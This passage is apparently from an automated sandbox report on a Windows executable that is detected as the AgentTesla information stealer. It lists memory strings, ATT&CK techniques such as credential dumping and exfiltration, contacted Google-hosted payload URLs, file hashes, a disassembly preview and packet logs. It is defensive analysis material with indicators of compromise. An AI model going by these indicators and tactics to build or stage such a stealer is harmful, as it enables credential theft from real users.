            Source: RegAsm.exe, 00000008.00000002.908708154.0000000001BD0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: RegAsm.exe, 00000008.00000002.908708154.0000000001BD0000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: RegAsm.exe, 00000008.00000002.908708154.0000000001BD0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_01204EF6 cpuid 8_2_01204EF6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000008.00000002.911956982.000000001DCC1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3296, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.911956982.000000001DCC1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3296, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000008.00000002.911956982.000000001DCC1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3296, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation211DLL Side-Loading1Process Injection112Virtualization/Sandbox Evasion34OS Credential DumpingSecurity Software Discovery631Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemoryVirtualization/Sandbox Evasion34Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery323VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

            Behavior Graph

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            GUEROLA INDUSTRIES N#U00ba de cuenta.exe4%ReversingLabs

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://MXXVzU.com0%Avira URL Cloudsafe
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://DynDns.comDynDNS0%URL Reputationsafe
            http://DynDns.comDynDNS0%URL Reputationsafe
            http://DynDns.comDynDNS0%URL Reputationsafe
            http://crl.pki.goog/GTS1O0%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
            http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
            http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
            http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
            http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
            http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
            http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
            http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
            http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
            http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
            http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
            http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
            http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
            http://ocsp.pki.goog/gsr2020%URL Reputationsafe
            http://ocsp.pki.goog/gsr2020%URL Reputationsafe
            http://ocsp.pki.goog/gsr2020%URL Reputationsafe
            https://pki.goog/repository/00%URL Reputationsafe
            https://pki.goog/repository/00%URL Reputationsafe
            https://pki.goog/repository/00%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            googlehosted.l.googleusercontent.com
            142.250.186.33
            truefalse
              high
              doc-14-9s-docs.googleusercontent.com
              unknown
              unknownfalse
                high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://MXXVzU.comRegAsm.exe, 00000008.00000002.911956982.000000001DCC1000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://127.0.0.1:HTTP/1.1RegAsm.exe, 00000008.00000002.911956982.000000001DCC1000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                low
                http://DynDns.comDynDNSRegAsm.exe, 00000008.00000002.911956982.000000001DCC1000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://crl.pki.goog/GTS1ORegAsm.exe, 00000008.00000002.908488503.00000000015E5000.00000004.00000020.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegAsm.exe, 00000008.00000002.911956982.000000001DCC1000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://ocsp.pki.goog/gts1o1core0RegAsm.exe, 00000008.00000002.908466549.00000000015BD000.00000004.00000020.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://crl.pki.goog/GTS1O1core.crl0RegAsm.exe, 00000008.00000002.908466549.00000000015BD000.00000004.00000020.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://doc-14-9s-docs.googleusercontent.com/URegAsm.exe, 00000008.00000002.908256124.000000000154B000.00000004.00000020.sdmpfalse
                  high
                  http://pki.goog/gsr2/GTS1O1.crt0RegAsm.exe, 00000008.00000002.908466549.00000000015BD000.00000004.00000020.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://crl.pki.goog/gsr2/gsr2.crl0?RegAsm.exe, 00000008.00000002.908466549.00000000015BD000.00000004.00000020.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://ocsp.pki.goog/gsr202RegAsm.exe, 00000008.00000002.908466549.00000000015BD000.00000004.00000020.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://pki.goog/repository/0RegAsm.exe, 00000008.00000002.908466549.00000000015BD000.00000004.00000020.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://doc-14-9s-docs.googleusercontent.com/docs/securesc/5ncffemq1843clkn140nheko96l7akee/3e4j78euRegAsm.exe, 00000008.00000002.908427204.000000000159F000.00000004.00000020.sdmp, RegAsm.exe, 00000008.00000002.908520125.00000000015FA000.00000004.00000020.sdmp, RegAsm.exe, 00000008.00000002.908488503.00000000015E5000.00000004.00000020.sdmpfalse
                    high
                    https://doc-14-9s-docs.googleusercontent.com/RegAsm.exe, 00000008.00000002.908256124.000000000154B000.00000004.00000020.sdmpfalse
                      high

                      Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public

                      IPDomainCountryFlagASNASN NameMalicious
                      142.250.186.33
                      unknownUnited States
                      15169GOOGLEUSfalse

                      General Information

                      Joe Sandbox Version:31.0.0 Emerald
                      Analysis ID:356269
                      Start date:22.02.2021
                      Start time:20:29:10
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 6m 4s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:GUEROLA INDUSTRIES N#U00ba de cuenta.exe
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:22
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal88.troj.evad.winEXE@4/0@1/1
                      EGA Information:Failed
                      HDC Information:
                      • Successful, ratio: 8.8% (good quality ratio 6.5%)
                      • Quality average: 38.5%
                      • Quality standard deviation: 24.7%
                      HCA Information:
                      • Successful, ratio: 92%
                      • Number of executed functions: 48
                      • Number of non-executed functions: 18
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Found application associated with file extension: .exe
                      Warnings:
                      Show All
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                      • Excluded IPs from analysis (whitelisted): 104.43.139.144, 204.79.197.200, 13.107.21.200, 13.107.5.88, 13.107.42.23, 23.57.81.29, 184.30.21.144, 104.42.151.234, 13.64.90.137, 51.11.168.160, 92.122.213.247, 92.122.213.194, 205.185.216.10, 205.185.216.42, 142.250.74.206, 216.58.212.142, 51.104.139.180, 52.155.217.156, 20.54.26.129
                      • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, docs.google.com, client-office365-tas.msedge.net, ocos-office365-s2s.msedge.net, arc.msn.com.nsatc.net, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, config-edge-skype.l-0014.l-msedge.net, l-0014.config.skype.com, a1449.dscg2.akamai.net, storeedgefd.xbetservices.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, drive.google.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, config.edge.skype.com, au-bg-shim.trafficmanager.net, storeedgefd.dsx.mp.microsoft.com, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, afdo-tas-offload.trafficmanager.net, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, l-0014.l-msedge.net, e16646.dscg.akamaiedge.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/356269/sample/GUEROLA INDUSTRIES N#U00ba de cuenta.exe

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      20:31:06API Interceptor401x Sleep call for process: RegAsm.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      142.250.186.33xerox for hycite.htmGet hashmaliciousBrowse
                        Muligheds.exeGet hashmaliciousBrowse

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          googlehosted.l.googleusercontent.comxerox for hycite.htmGet hashmaliciousBrowse
                          • 142.250.186.33
                          Muligheds.exeGet hashmaliciousBrowse
                          • 142.250.186.33
                          2021-Nouvelle masse salariale-Rapport.htmlGet hashmaliciousBrowse
                          • 216.58.209.33
                          SOLICITUD DE HERJIMAR, SL (HJM-745022821).exeGet hashmaliciousBrowse
                          • 216.58.208.161
                          #U6211#U662f#U56fe#U7247.exeGet hashmaliciousBrowse
                          • 216.58.208.161
                          OneNote rmos@dataflex-int.com.htmlGet hashmaliciousBrowse
                          • 216.58.208.129
                          Sponsor A Child, Best Online Donation Site, Top NGO - World Vision India.htmlGet hashmaliciousBrowse
                          • 172.217.20.225
                          barcelona-v-psg-liv-uefa-2021.htmlGet hashmaliciousBrowse
                          • 172.217.20.225
                          Barcelona-v-PSG-0tv.htmlGet hashmaliciousBrowse
                          • 172.217.20.225
                          CONSTRUCCIONES SAN MART#U00cdN, S.A. SOLICITAR. (SMT-14517022021).exeGet hashmaliciousBrowse
                          • 172.217.20.225
                          executable.908.exeGet hashmaliciousBrowse
                          • 216.58.208.161
                          executable.908.exeGet hashmaliciousBrowse
                          • 216.58.208.161
                          executable.908.exeGet hashmaliciousBrowse
                          • 216.58.208.161
                          executable.908.exeGet hashmaliciousBrowse
                          • 216.58.208.161
                          OEVGVSOGAH.dllGet hashmaliciousBrowse
                          • 216.58.206.65
                          executable.908.exeGet hashmaliciousBrowse
                          • 216.58.206.65
                          executable.908.exeGet hashmaliciousBrowse
                          • 216.58.206.65
                          executable.908.exeGet hashmaliciousBrowse
                          • 216.58.206.65
                          executable.908.exeGet hashmaliciousBrowse
                          • 216.58.206.65
                          executable.908.exeGet hashmaliciousBrowse
                          • 216.58.206.65

                          ASN

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          GOOGLEUSDHL eInvoice_Pdf.exeGet hashmaliciousBrowse
                          • 34.102.136.180
                          AWB-INVOICE_PDF.exeGet hashmaliciousBrowse
                          • 34.102.136.180
                          xerox for hycite.htmGet hashmaliciousBrowse
                          • 142.250.186.33
                          rad875FE.tmp.exeGet hashmaliciousBrowse
                          • 34.102.136.180
                          SecuriteInfo.com.Trojan.Inject4.6572.17143.exeGet hashmaliciousBrowse
                          • 34.102.136.180
                          IMG_61061_SCANNED.docGet hashmaliciousBrowse
                          • 35.200.172.247
                          X1(1).xlsmGet hashmaliciousBrowse
                          • 142.250.186.66
                          IMG_6078_SCANNED.docGet hashmaliciousBrowse
                          • 35.200.172.247
                          fedex.apkGet hashmaliciousBrowse
                          • 142.250.186.138
                          Muligheds.exeGet hashmaliciousBrowse
                          • 142.250.186.33
                          X1(1).xlsmGet hashmaliciousBrowse
                          • 142.250.186.66
                          DHL Document. PDF.exeGet hashmaliciousBrowse
                          • 34.102.136.180
                          ydQ0ICWj5v.exeGet hashmaliciousBrowse
                          • 35.228.227.140
                          r4yGYPyWb7.exeGet hashmaliciousBrowse
                          • 35.228.227.140
                          X1(1).xlsmGet hashmaliciousBrowse
                          • 142.250.186.66
                          aif9fEvN5g.exeGet hashmaliciousBrowse
                          • 35.228.227.140
                          IMG_01670_Scanned.docGet hashmaliciousBrowse
                          • 35.200.172.247
                          eInvoice.exeGet hashmaliciousBrowse
                          • 34.102.136.180
                          IMG_7742_Scanned.docGet hashmaliciousBrowse
                          • 34.102.136.180
                          SWIFT Payment W0301.docGet hashmaliciousBrowse
                          • 35.200.172.247

                          JA3 Fingerprints

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          37f463bf4616ecd445d4a1937da06e19receipt145.htmGet hashmaliciousBrowse
                          • 142.250.186.33
                          xerox for hycite.htmGet hashmaliciousBrowse
                          • 142.250.186.33
                          SecuriteInfo.com.Heur.15528.xlsGet hashmaliciousBrowse
                          • 142.250.186.33
                          Muligheds.exeGet hashmaliciousBrowse
                          • 142.250.186.33
                          DHL_6368638172 documento de recibo,pdf.exeGet hashmaliciousBrowse
                          • 142.250.186.33
                          PDF.exeGet hashmaliciousBrowse
                          • 142.250.186.33
                          pagamento.exeGet hashmaliciousBrowse
                          • 142.250.186.33
                          message_zdm (2).htmlGet hashmaliciousBrowse
                          • 142.250.186.33
                          Statement-ID28865611496334.vbsGet hashmaliciousBrowse
                          • 142.250.186.33
                          Statement-ID21488878391791.vbsGet hashmaliciousBrowse
                          • 142.250.186.33
                          frank_2021-02-22_02-03.exeGet hashmaliciousBrowse
                          • 142.250.186.33
                          Statement-ID72347595684775.vbsGet hashmaliciousBrowse
                          • 142.250.186.33
                          MR52.vbsGet hashmaliciousBrowse
                          • 142.250.186.33
                          Scan_medcal equipment sample_pdf.exeGet hashmaliciousBrowse
                          • 142.250.186.33
                          rfq02212021.exeGet hashmaliciousBrowse
                          • 142.250.186.33
                          RE ICA 40 Sdn Bhd- Purchase Order#6769704.exeGet hashmaliciousBrowse
                          • 142.250.186.33
                          RFQ-#09503.exeGet hashmaliciousBrowse
                          • 142.250.186.33
                          RFQ_1101983736366355 1101938377388.exeGet hashmaliciousBrowse
                          • 142.250.186.33
                          Offer Request 6100003768.exeGet hashmaliciousBrowse
                          • 142.250.186.33
                          124992436.docxGet hashmaliciousBrowse
                          • 142.250.186.33

                          Dropped Files

                          No context

                          Created / dropped Files

                          No created / dropped files found

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):5.514109730917141
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.15%
                          • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:GUEROLA INDUSTRIES N#U00ba de cuenta.exe
                          File size:73728
                          MD5:9bca56d197da87e223e660316b3a48a0
                          SHA1:1950233071e9942921e9238bdf5c68c01182158c
                          SHA256:d30d1ebb4f2b3e74d4bef8630c51514337ce4f59fe393bc978534a5bdb06a1c2
                          SHA512:0263c372b2ddc417dda8e176b4397965a7d5e8ae3b2c011123be3145ad21273e7d765d1ecb5914a1725f2cf324ba4ba8bc27ca9bae9b789809cd2d0881355659
                          SSDEEP:768:zIRDN3RKfu2EuliepSkunQgrky77t3qPHxpA5Ci03RZZe1KYZNI/k/GD:kRD+zQWCQgbNqfxiUi03RZZe1KY/ZGD
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L...qb.R.....................0....................@................

                          File Icon

                          Icon Hash:1e74f2ea62e4a082

                          Static PE Info

                          General

                          Entrypoint:0x401494
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                          DLL Characteristics:
                          Time Stamp:0x52D66271 [Wed Jan 15 10:26:57 2014 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:b84199caadebcbcd5f63d7b7de7ff518

                          Entrypoint Preview

                          Instruction
                          push 0040A258h
                          call 00007F9C58B091D3h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          xor byte ptr [eax], al
                          add byte ptr [eax], al
                          dec eax
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [ecx+eax*8+27h], bh
                          dec eax
                          aam 23h
                          add al, byte ptr [edi-7Ch]
                          push ecx
                          wait
                          adc esp, dword ptr [ecx]
                          adc eax, 00005A4Eh
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add dword ptr [eax], eax
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          dec ecx
                          outsb
                          arpl word ptr fs:[edi+72h], bp
                          outsd
                          jne 00007F9C58B09255h
                          outsb
                          jnc 00007F9C58B09256h
                          jnc 00007F9C58B09215h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add bh, bh
                          int3
                          xor dword ptr [eax], eax
                          or dword ptr [esi+edi*8+155F6A61h], esi
                          lodsb
                          inc ebx
                          movsd
                          inc esp
                          std
                          pop ebp

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0xf2e40x28.text
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x120000xbfc.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
                          IMAGE_DIRECTORY_ENTRY_IAT0x10000x150.text
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000xe8840xf000False0.401302083333data6.05504586492IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                          .data0x100000x12180x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                          .rsrc0x120000xbfc0x1000False0.26416015625data2.88799096986IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountry
                          RT_ICON0x123540x8a8data
                          RT_GROUP_ICON0x123400x14data
                          RT_VERSION0x120f00x250dataEnglishUnited States

                          Imports

                          DLLImport
                          MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaVarForInit, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaVarTstEq, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaErrorOverflow, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaLateMemCall, __vbaStrToAnsi, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, _CItan, __vbaVarForNext, _CIexp, __vbaFreeStr, __vbaFreeObj

                          Version Infos

                          DescriptionData
                          Translation0x0409 0x04b0
                          InternalNameLONDRES
                          FileVersion1.00
                          CompanyNameLog
                          ProductNameLog Inverter
                          ProductVersion1.00
                          FileDescriptionLog Inverter
                          OriginalFilenameLONDRES.exe

                          Possible Origin

                          Language of compilation systemCountry where language is spokenMap
                          EnglishUnited States

                          Network Behavior

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Feb 22, 2021 20:30:57.104084015 CET49746443192.168.2.4142.250.186.33
                          Feb 22, 2021 20:30:57.152667999 CET44349746142.250.186.33192.168.2.4
                          Feb 22, 2021 20:30:57.152837038 CET49746443192.168.2.4142.250.186.33
                          Feb 22, 2021 20:30:57.153913975 CET49746443192.168.2.4142.250.186.33
                          Feb 22, 2021 20:30:57.203562975 CET44349746142.250.186.33192.168.2.4
                          Feb 22, 2021 20:30:57.210624933 CET44349746142.250.186.33192.168.2.4
                          Feb 22, 2021 20:30:57.210671902 CET44349746142.250.186.33192.168.2.4
                          Feb 22, 2021 20:30:57.210695028 CET44349746142.250.186.33192.168.2.4
                          Feb 22, 2021 20:30:57.210716963 CET44349746142.250.186.33192.168.2.4
                          Feb 22, 2021 20:30:57.210891008 CET49746443192.168.2.4142.250.186.33
                          Feb 22, 2021 20:30:57.210935116 CET49746443192.168.2.4142.250.186.33
                          Feb 22, 2021 20:30:57.226625919 CET49746443192.168.2.4142.250.186.33
                          Feb 22, 2021 20:30:57.277502060 CET44349746142.250.186.33192.168.2.4
                          Feb 22, 2021 20:30:57.278716087 CET49746443192.168.2.4142.250.186.33
                          Feb 22, 2021 20:30:57.280087948 CET49746443192.168.2.4142.250.186.33
                          Feb 22, 2021 20:30:57.335387945 CET44349746142.250.186.33192.168.2.4
                          Feb 22, 2021 20:30:57.447724104 CET44349746142.250.186.33192.168.2.4
                          Feb 22, 2021 20:30:57.447765112 CET44349746142.250.186.33192.168.2.4
                          Feb 22, 2021 20:30:57.447792053 CET44349746142.250.186.33192.168.2.4
                          Feb 22, 2021 20:30:57.447814941 CET44349746142.250.186.33192.168.2.4
                          Feb 22, 2021 20:30:57.447855949 CET49746443192.168.2.4142.250.186.33
                          Feb 22, 2021 20:30:57.447882891 CET49746443192.168.2.4142.250.186.33
                          Feb 22, 2021 20:30:57.818649054 CET49746443192.168.2.4142.250.186.33
                          Feb 22, 2021 20:30:57.866982937 CET44349746142.250.186.33192.168.2.4
                          Feb 22, 2021 20:30:58.070207119 CET44349746142.250.186.33192.168.2.4
                          Feb 22, 2021 20:30:58.070234060 CET44349746142.250.186.33192.168.2.4
